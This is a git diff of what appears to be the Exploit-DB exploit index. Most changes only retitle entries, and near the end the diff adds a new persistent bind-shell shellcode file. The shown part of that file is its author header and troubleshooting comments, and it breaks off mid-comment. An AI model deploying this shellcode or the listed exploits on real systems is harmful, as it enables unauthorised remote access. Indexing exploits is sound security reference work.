Polyakov",php,webapps,0 31236,platforms/php/webapps/31236.txt,"Jinzora 2.7.5 ajax_request.php Multiple Parameter XSS",2008-02-19,"Alexandr Polyakov",php,webapps,0 31237,platforms/php/webapps/31237.txt,"Jinzora 2.7.5 slim.php Multiple Parameter XSS",2008-02-19,"Alexandr Polyakov",php,webapps,0 @@ -28491,7 +28491,7 @@ id,file,description,date,author,platform,type,port 31627,platforms/unix/dos/31627.c,"LICQ <= 1.3.5 - File Descriptor Remote Denial of Service",2008-04-08,"Milen Rangelov",unix,dos,0 31628,platforms/php/webapps/31628.txt,"Swiki 1.5 - HTML Injection and Cross-Site Scripting Vulnerabilities",2008-04-08,"Brad Antoniewicz",php,webapps,0 31629,platforms/windows/dos/31629.txt,"HP OpenView Network Node Manager 7.x - 'ovspmd' Buffer Overflow",2008-04-08,"Luigi Auriemma",windows,dos,0 -31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/ 9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution",2008-04-08,"Javier Vicente Vallejo",linux,remote,0 +31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution",2008-04-08,"Javier Vicente Vallejo",linux,remote,0 31631,platforms/php/webapps/31631.txt,"Pragmatic Utopia PU Arcade <= 2.2 - 'gid' Parameter SQL Injection",2008-04-09,MantiS,php,webapps,0 31632,platforms/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 Picture Source HTML Injection",2008-04-09,OneIdBeagl3,windows,remote,0 31633,platforms/php/webapps/31633.html,"phpBB Fishing Cat Portal Addon - 'functions_portal.php' Remote File Include",2008-04-09,bd0rk,php,webapps,0 @@ -28819,7 +28819,7 @@ id,file,description,date,author,platform,type,port 31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway 'PARAMS' Parameter Cross-Site Scripting",2008-06-26,"Erez Metula",asp,webapps,0 31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 Malformed Playlist File Denial Of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0 32135,platforms/php/webapps/32135.txt,"common solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting",2008-07-31,"Ghost Hacker",php,webapps,0 -32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/ 5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0 +32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0 32047,platforms/php/webapps/32047.txt,"Hudson 1.223 - 'q' Parameter Cross-Site Scripting",2008-07-11,syniack,php,webapps,0 32048,platforms/osx/remote/32048.html,"Apple iPhone and iPod Touch < 2.0 - Multiple Remote Vulnerabilities",2008-07-11,"Hiromitsu Takagi",osx,remote,0 31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80 @@ -30314,7 +30314,7 @@ id,file,description,date,author,platform,type,port 33633,platforms/windows/webapps/33633.txt,"IPSwitch IMail Server WEB client 12.4 persistent XSS",2014-06-03,Peru,windows,webapps,0 33644,platforms/php/webapps/33644.txt,"Basic-CMS 'nav_id' Parameter Cross-Site Scripting",2010-02-12,Red-D3v1L,php,webapps,0 33641,platforms/php/webapps/33641.txt,"Joomla! F!BB Component 1.5.96 RC SQL Injection and HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0 -33642,platforms/windows/remote/33642.html,"Symantec Multiple Products Client Proxy ActiveX (CLIproxy.dll) Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0 +33642,platforms/windows/remote/33642.html,"Symantec Multiple Products - Client Proxy ActiveX (CLIproxy.dll) Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0 33643,platforms/php/webapps/33643.txt,"CMS Made Simple 1.6.6 - Local File Include and Cross-Site Scripting Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0 33647,platforms/asp/webapps/33647.txt,"Portrait Software Portrait Campaign Manager 4.6.1.22 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-16,"Roel Schouten",asp,webapps,0 33648,platforms/hardware/remote/33648.txt,"Huawei HG510 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-16,"Ivan Markovic",hardware,remote,0 @@ -31203,7 +31203,7 @@ id,file,description,date,author,platform,type,port 34643,platforms/php/webapps/34643.txt,"Silurus Classifieds category.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0 34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0 34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0 -34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0 +34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) - Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0 34647,platforms/windows/remote/34647.txt,"Ammyy Admin 3.5 - RCE",2014-09-13,scriptjunkie,windows,remote,0 34648,platforms/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape PoC",2014-09-13,"Joxean Koret",windows,local,0 34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 - 'login2.php' Cross-Site Scripting",2010-09-17,"Gjoko Krstic",php,webapps,0 @@ -31430,8 +31430,8 @@ id,file,description,date,author,platform,type,port 34890,platforms/php/webapps/34890.txt,"Wiccle Web Builder 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-10-21,"Veerendra G.G",php,webapps,0 34891,platforms/php/webapps/34891.txt,"Micro CMS 1.0 - 'name' Parameter HTML Injection",2010-10-21,"SecPod Research",php,webapps,0 34892,platforms/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Parameter Cross-Site Scripting",2010-10-21,"Antu Sanadi",php,webapps,0 -34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0 -34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0 +34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0 +34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0 34895,platforms/cgi/webapps/34895.rb,"Bash CGI - RCE Shellshock Exploit (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0 34896,platforms/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit (Shellshock)",2014-10-06,"Phil Blank",linux,remote,0 34922,platforms/php/webapps/34922.txt,"Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 @@ -31479,7 +31479,7 @@ id,file,description,date,author,platform,type,port 34943,platforms/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",windows,remote,0 34944,platforms/php/webapps/34944.txt,"SmartOptimizer Null Character Remote Information Disclosure",2010-11-01,"Francois Harvey",php,webapps,0 34945,platforms/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 - Directory Traversal",2010-11-01,"John Leitch",multiple,remote,0 -34946,platforms/php/webapps/34946.txt,"cformsII 11.5/ 13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0 +34946,platforms/php/webapps/34946.txt,"cformsII 11.5/13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0 34947,platforms/php/webapps/34947.txt,"CMS WebManager-Pro 7.4.3 - Cross-Site Scripting and SQL Injection Vulnerabilities",2010-10-30,MustLive,php,webapps,0 34948,platforms/asp/webapps/34948.txt,"Douran Portal 3.9.7.55 - Arbitrary File Upload and Cross-Site Scripting Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps,0 34949,platforms/multiple/remote/34949.py,"BroadWorks Call Detail Record Security Bypass",2010-11-02,"Nick Freeman",multiple,remote,0 @@ -31532,7 +31532,7 @@ id,file,description,date,author,platform,type,port 35004,platforms/php/webapps/35004.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (1)",2010-11-18,"High-Tech Bridge SA",php,webapps,0 35005,platforms/windows/remote/35005.html,"WebKit Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",windows,remote,0 35006,platforms/windows/remote/35006.html,"WebKit Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0 -35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0 +35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0 35008,platforms/cgi/webapps/35008.txt,"Hot Links SQL 3.2 - 'report.cgi' SQL Injection",2010-11-22,"Aliaksandr Hartsuyeu",cgi,webapps,0 35009,platforms/php/webapps/35009.txt,"AuraCMS 1.62 - 'pdf.php' SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 35010,platforms/osx/local/35010.c,"Apple iOS <= 4.0.2 - Networking Packet Filter Rules Local Privilege Escalation",2010-11-22,Apple,osx,local,0 @@ -31669,7 +31669,7 @@ id,file,description,date,author,platform,type,port 35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection",2010-12-28,"non customers",php,webapps,0 35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 - Cross-Site Scripting",2010-12-23,"Gjoko Krstic",multiple,remote,0 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' Parameter SQL Injection",2010-12-27,Dr.NeT,php,webapps,0 -35146,platforms/php/webapps/35146.txt,"PHP 5.x (< 5.6.2) - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0 +35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal",2010-12-24,anonymous,linux,remote,0 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 @@ -31974,9 +31974,9 @@ id,file,description,date,author,platform,type,port 35482,platforms/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 - 'year' Parameter Cross-Site Scripting",2011-03-21,"kurdish hackers team",php,webapps,0 35483,platforms/php/dos/35483.txt,"PHP 5.3.x - 'Intl' Extension 'NumberFormatter::setSymbol()' Function Denial of Service",2011-03-10,thoger,php,dos,0 35484,platforms/php/dos/35484.php,"PHP 5.3.x - 'Zip' Extension 'stream_get_contents()' Function Denial of Service",2011-03-10,paulgao,php,dos,0 -35485,platforms/php/dos/35485.php,"PHP 5.x (< 5.3.6) 'Zip' Extension - 'zip_fread()' Function Denial of Service",2011-03-10,TorokAlpar,php,dos,0 -35486,platforms/php/dos/35486.php,"PHP 5.x (< 5.3.6) OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0 -35487,platforms/php/dos/35487.php,"PHP 5.x (< 5.3.6) OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0 +35485,platforms/php/dos/35485.php,"PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Function Denial of Service",2011-03-10,TorokAlpar,php,dos,0 +35486,platforms/php/dos/35486.php,"PHP < 5.3.6 OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0 +35487,platforms/php/dos/35487.php,"PHP < 5.3.6 OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0 35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x HFS Subsystem Information Disclosure",2011-03-21,"Dan Rosenberg",osx,local,0 35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0 35490,platforms/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,php,webapps,0 @@ -32306,7 +32306,7 @@ id,file,description,date,author,platform,type,port 35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change Exploit",2015-02-05,"Todor Donev",hardware,remote,0 35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0 35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers PPPoE Credentials Information Disclosure",2011-07-27,securititracker,hardware,remote,0 -35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products Authenticated File Upload",2015-01-20,Metasploit,java,remote,8080 +35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products - Authenticated File Upload",2015-01-20,Metasploit,java,remote,8080 35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80 35847,platforms/osx/local/35847.c,"OS X networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0 35848,platforms/osx/local/35848.c,"OS X 10.9.5 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0 @@ -32431,7 +32431,7 @@ id,file,description,date,author,platform,type,port 35965,platforms/php/webapps/35965.txt,"Joomla! 'com_resman' Component Cross Site Scripting",2011-07-15,SOLVER,php,webapps,0 35966,platforms/php/webapps/35966.txt,"Joomla! 'com_newssearch' Component SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0 35967,platforms/php/webapps/35967.txt,"AJ Classifieds 'listingid' Parameter - SQL Injection",2011-07-15,Lazmania61,php,webapps,0 -35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products Multiple SQL Injection Vulnerabilities",2011-07-18,Lazmania61,php,webapps,0 +35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products - Multiple SQL Injection Vulnerabilities",2011-07-18,Lazmania61,php,webapps,0 35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,php,webapps,0 35970,platforms/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ Cross Site Request Forgery and HTML Injection Vulnerabilities",2011-07-18,MustLive,hardware,remote,0 35971,platforms/php/webapps/35971.txt,"WordPress bSuite Plugin 4.0.7 - Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps,0 @@ -32573,10 +32573,10 @@ id,file,description,date,author,platform,type,port 36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 - 'index.php' Local File Include",2011-09-15,KedAns-Dz,php,webapps,0 36137,platforms/php/webapps/36137.txt,"PunBB <= 1.3.5 Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps,0 36138,platforms/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 - 'id' Parameter SQL Injection",2011-09-18,m3rciL3Ss,asp,webapps,0 -36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products Multiple SQL Injection Vulnerabilities",2011-09-17,m3rciL3Ss,asp,webapps,0 +36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products - Multiple SQL Injection Vulnerabilities",2011-09-17,m3rciL3Ss,asp,webapps,0 36140,platforms/php/webapps/36140.txt,"Toko LiteCMS 1.5.2 HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 - 'matchword' Parameter Cross Site Scripting",2011-09-19,"kurdish hackers team",asp,webapps,0 -36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products 'dir' parameters Multiple Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 +36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products - 'dir' parameters Multiple Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 36143,platforms/osx/local/36143.txt,"Apple Mac OS X Lion Directory Services Security Bypass Vulnerabilities",2011-09-19,"Defence in Depth",osx,local,0 36144,platforms/php/webapps/36144.txt,"Card sharj 1.0 Multiple SQL Injection Vulnerabilities",2011-09-19,Net.Edit0r,php,webapps,0 36145,platforms/windows/remote/36145.py,"IBM Lotus Domino 8.5.2 - 'NSFComputeEvaluateExt()' Function Remote Stack Buffer Overflow",2011-09-20,rmallof,windows,remote,0 @@ -33675,7 +33675,7 @@ id,file,description,date,author,platform,type,port 37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh shellcode (2) (21 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0 37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection",2015-06-15,"walid naceri",php,webapps,0 37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service",2015-06-15,3unnym00n,windows,dos,0 -37293,platforms/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,linux,local,0 +37293,platforms/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,linux,local,0 37561,platforms/multiple/dos/37561.pl,"UPNPD M-SEARCH ssdp:discover Reflection Denial of Service",2015-07-10,"Todor Donev",multiple,dos,1900 37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 Multiple SQL Injection and Local File Include Vulnerabilities",2012-05-27,n4ss1m,php,webapps,0 37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 Database Information Disclosure",2012-05-28,L3b-r1'z,php,webapps,0 @@ -33768,7 +33768,7 @@ id,file,description,date,author,platform,type,port 37412,platforms/php/webapps/37412.php,"Joomla! Maian Media Component 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0 37413,platforms/php/webapps/37413.txt,"Joomla JCal Pro Calendar Component SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0 37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 Multiple SQL Injection Vulnerabilities",2012-06-16,JosS,php,webapps,0 -37415,platforms/php/webapps/37415.txt,"Webify Multiple Products Multiple HTML Injection and Local File Include Vulnerabilities",2012-06-16,snup,php,webapps,0 +37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection and Local File Include Vulnerabilities",2012-06-16,snup,php,webapps,0 37416,platforms/java/webapps/37416.txt,"Squiz CMS Multiple Cross Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0 37417,platforms/php/webapps/37417.php,"WordPress Multiple Themes 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 @@ -33881,7 +33881,7 @@ id,file,description,date,author,platform,type,port 37621,platforms/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (1)",2015-07-15,"Pedro Ribeiro",windows,webapps,0 37530,platforms/php/webapps/37530.txt,"WordPress WP e-Commerce Shop Styling Plugin 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80 37531,platforms/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",hardware,webapps,0 -37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080 +37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products - OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080 37533,platforms/asp/webapps/37533.txt,"Orchard CMS 1.7.3/1.8.2/1.9.0 - Stored XSS",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80 37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow",2015-07-08,Metasploit,multiple,remote,0 37537,platforms/php/webapps/37537.txt,"phpProfiles Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0 @@ -34025,7 +34025,7 @@ id,file,description,date,author,platform,type,port 37692,platforms/multiple/dos/37692.pl,"aMSN Remote Denial of Service",2006-01-01,"Braulio Miguel Suarez Urquijo",multiple,dos,0 37693,platforms/php/webapps/37693.txt,"Sitemax Maestro SQL Injection and Local File Include Vulnerabilities",2012-09-03,AkaStep,php,webapps,0 37694,platforms/php/webapps/37694.txt,"Wiki Web Help 'configpath' Parameter Remote File Include",2012-08-04,L0n3ly-H34rT,php,webapps,0 -37695,platforms/php/webapps/37695.txt,"Sciretech Multiple Products Multiple SQL Injection Vulnerabilities",2012-09-04,AkaStep,php,webapps,0 +37695,platforms/php/webapps/37695.txt,"Sciretech Multiple Products - Multiple SQL Injection Vulnerabilities",2012-09-04,AkaStep,php,webapps,0 37696,platforms/asp/webapps/37696.txt,"Cm3 CMS 'search.asp' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,Crim3R,asp,webapps,0 37697,platforms/php/webapps/37697.txt,"phpFox 3.0.1 - 'ajax.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0 37698,platforms/php/webapps/37698.txt,"Kayako Fusion 'download.php' Cross Site Scripting",2012-09-05,"High-Tech Bridge",php,webapps,0 @@ -34949,7 +34949,7 @@ id,file,description,date,author,platform,type,port 38676,platforms/php/webapps/38676.txt,"WordPress Duplicator Plugin Cross Site Scripting",2013-07-24,"High-Tech Bridge",php,webapps,0 38677,platforms/php/webapps/38677.txt,"VBulletin <= 4.0.2 - 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0 38678,platforms/php/webapps/38678.txt,"WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0 -38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) Multiple Cross Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 +38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) - Multiple Cross Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0 38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0 38682,platforms/php/webapps/38682.txt,"Jahia xCM /engines/manager.jsp site Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0 @@ -35929,7 +35929,7 @@ id,file,description,date,author,platform,type,port 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - bindshell (Port 5600) shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0 39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0 -40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 +40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0 39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP Shellcode (IPv6) (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 @@ -36270,7 +36270,7 @@ id,file,description,date,author,platform,type,port 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Continuously-Probing Reverse Shell via Socket + Port-range + Password shellcode (172 bytes)",2016-07-11,CripSlick,lin_x86-64,shellcode,0 40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 and 11 - Main.swf Hardcoded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0 40107,platforms/windows/local/40107.rb,"Windows 7-10 and 2k8-2k12 x86/x64 - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0 -40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",2016-07-13,Metasploit,linux,remote,443 +40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution",2016-07-13,Metasploit,linux,remote,443 40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple CSRF Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80 @@ -36280,3 +36280,7 @@ id,file,description,date,author,platform,type,port 40118,platforms/windows/local/40118.txt,"Internet Explorer 11 (on Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0 40119,platforms/linux/remote/40119.md,"DropBearSSHD <= 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution and Escalate Privileges",2016-07-17,b0yd,hardware,remote,0 +40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83_ 148_ 177 bytes)",2016-07-19,CripSlick,lin_x86-64,shellcode,0 +40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit",2016-07-19,bashis,multiple,remote,0 +40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 +40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 diff --git a/platforms/lin_x86-64/shellcode/40122.txt b/platforms/lin_x86-64/shellcode/40122.txt new file mode 100755 index 000000000..438dc3048 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/40122.txt @@ -0,0 +1,161 @@ +#include +#include + +//| Exploit Title: [Syscall Persistent Bind Shell + (multi-terminal) + password + daemon (83, 148, 177 bytes)] +//| Date: [7/15/2016] +//| Exploit Author: [CripSlick] +//| Tested on: [Kali 2.0 x86_x64] +//| Version: [No Program Version, Only Syscalls Used] + +//| ShepherdDowling@gmail.com +//| OffSec ID: OS-20614 +//| http://50.112.22.183/ + + +//|========================================================================================= +//|=============== CripSlick's Persistent Bind-Shell with Port-Range + password ============ +//| +//| +//| CODE 3 Has everything to offer that CODE2 has and more. CODE2 has everything to offer +//| that CODE1 has and more. CODE1 is still great due to being a very short bind shell. +//| The point is that that there is really ONLY 1 shellcode here, it is just that CODE2 & +//| CODE1 have less features to cut down on byte count giving you more options. +//| +//| Troubleshooting: +//| 1. Problem: A lot of ports appeared on "nmap -p-" but not my port? +//| 1. Answer: This is common when you swap the high and low port +//| +//| 2. Problem: I disconnected and can't reconnect (even when I use the right password) +//| 2. Answer: This is common when re-executing the program (even after making changes) +//| Solve this by closing the terminal completly out, going to your directory +//| recompiling the program and then relaunching. +//| +//| If it is because you typed in the password wrong, wait about 60 seconds to +//| 